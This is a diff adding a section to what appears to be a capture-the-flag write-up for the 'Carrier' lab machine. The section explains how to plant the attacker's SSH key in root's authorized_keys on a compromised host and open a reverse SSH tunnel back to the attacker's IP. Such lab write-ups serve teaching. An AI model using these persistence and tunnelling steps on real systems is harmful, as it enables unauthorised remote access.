remote port forwarding

--- a/_posts/2019-01-12-Carrier.md
+++ b/_posts/2019-01-12-Carrier.md
@@ -256,5 +256,14 @@ Address                  HWtype  HWaddress           Flags Mask            Iface
 10.99.64.251             ether   00:16:3e:f3:92:14   C                     eth0
 ```
 
+Moving on, the attacking system's public SSH key can be copied to the `authorized_keys` file on the `r1` system. This allows for access over SSH in a more stable manner than the upgraded Python shell allows for. Remote port forwarding is required for this to work. The steps to access `r1` over SSH are shown below.
+
+1. Copy the public SSH key `id_rsa.pub` from the attacking system to the `/root/.ssh/authorized_keys` file on `r1` (`10.10.10.105`).
+2. If necessary,  start the SSH service on the attacking machine with `service ssh start`.
+3. Issue `ssh -f -N -R 2222:localhost:22 root@10.10.14.5` on `r1`. This command opens up port `2222` on the attacking system and forwards the target system's port `22` to the attacking system's port `2222`. Note that `10.10.14.5` is the attacking system's IP in this example.
+4. Issue `ssh root@locahost -p 2222` to connect to the SSH service on port 22 of `r1`
+
+
+
 
 
